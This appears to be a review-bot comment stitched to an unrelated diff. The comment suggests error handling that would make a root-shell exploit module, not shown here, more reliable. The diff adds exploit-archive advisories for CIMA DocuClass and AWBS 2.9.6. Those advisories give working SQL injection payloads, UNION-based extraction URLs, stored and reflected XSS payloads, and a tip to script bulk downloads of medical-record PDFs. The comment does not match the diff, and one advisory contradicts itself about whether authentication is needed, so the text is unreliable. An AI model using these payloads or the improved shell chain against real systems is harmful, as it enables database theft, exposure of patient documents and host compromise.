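Review bot: get_monitored_host returns silently when the ajaxhelper.php response has no HTML document (`return unless res && (html = res.get_html_document)`), unlike every other step in the chain, which calls fail_with; @monitored_host is then nil and pop_dat_shell still fires the graphApi.php request with an empty `host`, so a transient error surfaces as "exploit completed, but no session" rather than a clear failure. Replacing the early return with `fail_with(Failure::UnexpectedReply, 'Host status table not returned! punt!') unless res && (html = res.get_html_document)` keeps the chain's error handling consistent with get_api_token and get_admin_cookie. upload_root_shell has the same gap in a different shape: it only inspects `res && res.code != 200`, so a nil response (timeout during the multipart upload) falls through to pop_dat_shell as well; a `fail_with(Failure::Unreachable, 'No response to component upload! punt!') unless res` before that check would close it.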
@@ -0,0 +1,62 @@
+# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
+# Date: [July 15, 2016]
+# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
+# Vendor Homepage: [cima-software.com]
+# Version: [app version] (All)
+# Tested on: [Microsoft Windows 2008 R2]
+
+DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
+
+Vulnerability Details
+
+1. SQL Injection [Post Auth]
+
+PoC
+
+Vulnerable URLs & parameters:
+
+A: POST request
+/dcrpcserver.php [parameter - uid]
+---
+Parameter: uid (POST)
+ Type: boolean-based blind
+ Title: PostgreSQL boolean-based blind - Parameter replace
+ Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
+---
+web server operating system: Windows 2008 R2 or 7
+web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
+back-end DBMS: Microsoft SQL Server 2008
+
+Impact
+An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
+
+B: GET request
+/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
+
+
+2. Access Control Flaws
+DocuClass web application does not enforce strict access control.
+
+PoC:
+http://IP/medical_records/0000001337/0000000000123456.pdf
+
+Dump all the documents with a bit of scripting.
+
+Impact
+An unauthenticated user can access stored documents by directly calling the document url.
+
+3. Cross-Site Scripting
+
+DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
+
+/e-forms/dcformsserver.exe [action parameter]
+/e-forms/dcformsserver.exe [documentid parameter]
+/e-forms/dcformsserver.exe [userid parameter]
+/reports_server.php [cmd parameter]
+/reports_server.php [reportid parameter]
+/reports_server.php [uid parameter]
+
+Impact
+An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+
++++++
\ No newline at end of file
diff --git a/platforms/php/webapps/40062.txt b/platforms/php/webapps/40062.txt
new file mode 100755
index 000000000..2f3f6d534
--- /dev/null
+++ b/platforms/php/webapps/40062.txt
@@ -0,0 +1,100 @@
+AWBS v2.9.6 Multiple Remote Vulnerabilities
+
+
+Vendor: Total Online Solutions, Inc.
+Product web page: http://www.awbs.com
+Affected version: 2.9.6
+Platform: PHP
+
+Summary: Whether starting new or looking to expand your
+existing web hosting and/or domain registration business,
+the AWBS fully automated solutions and unique features will
+allow you achieve your goal with minimum effort and cost.
+
+Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
+Input passed via the 'cat' and 'so' GET parameters are not properly
+sanitised before being returned to the user or used in SQL queries.
+This can be exploited to manipulate SQL queries by injecting arbitrary
+SQL code. Multiple cross-site scripting vulnerabilities were also
+discovered. The issue is triggered when input passed via multiple
+parameters is not properly sanitized before being returned to the
+user. This can be exploited to execute arbitrary HTML and script
+code in a user's browser session in context of an affected site.
+
+Tested on: Apache
+ PHP/5.3.28
+ MySQL/5.5.50-cll
+
+
+Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5337
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
+
+
+08.06.2016
+
+--
+
+
+1. SQL Injection:
+-----------------
+
+Parameter: cat, so (GET)
+POC URL:
+http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
+http://localhost/admin/hostingadmin.php?list=f&so=domain%27
+http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
+http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
+http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
+http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
+
+
+
+2. 
Cross-Site Scripting (Stored):
+---------------------------------
+
+http://localhost/admin/cmanage.php
+Parameters: reason (POST)
+
+Payload(s):
+%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+
+http://localhost/admin/helpdesk.php
+Parameters: hd_name, hd_url, hd_subject (POST)
+
+Payload(s):
+Content-Disposition: form-data; name="hd_name"
+
+">
+-----------------------------28698210634144
+Content-Disposition: form-data; name="hd_url"
+
+">
+-----------------------------28698210634144
+Content-Disposition: form-data; name="hd_subject"
+
+
+-----------------------------28698210634144
+
+
+
+3. Cross-Site Scripting (Reflected):
+------------------------------------
+
+http://localhost/admin/useradmin.php
+Parameters: list (POST)
+
+http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
+Parameters: search, cat, list, so (GET)
+
+http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
+Parameter: list (GET)
+
+http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
+Parameters: id, sd (GET)
+
+Payload(s):
+%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
\ No newline at end of file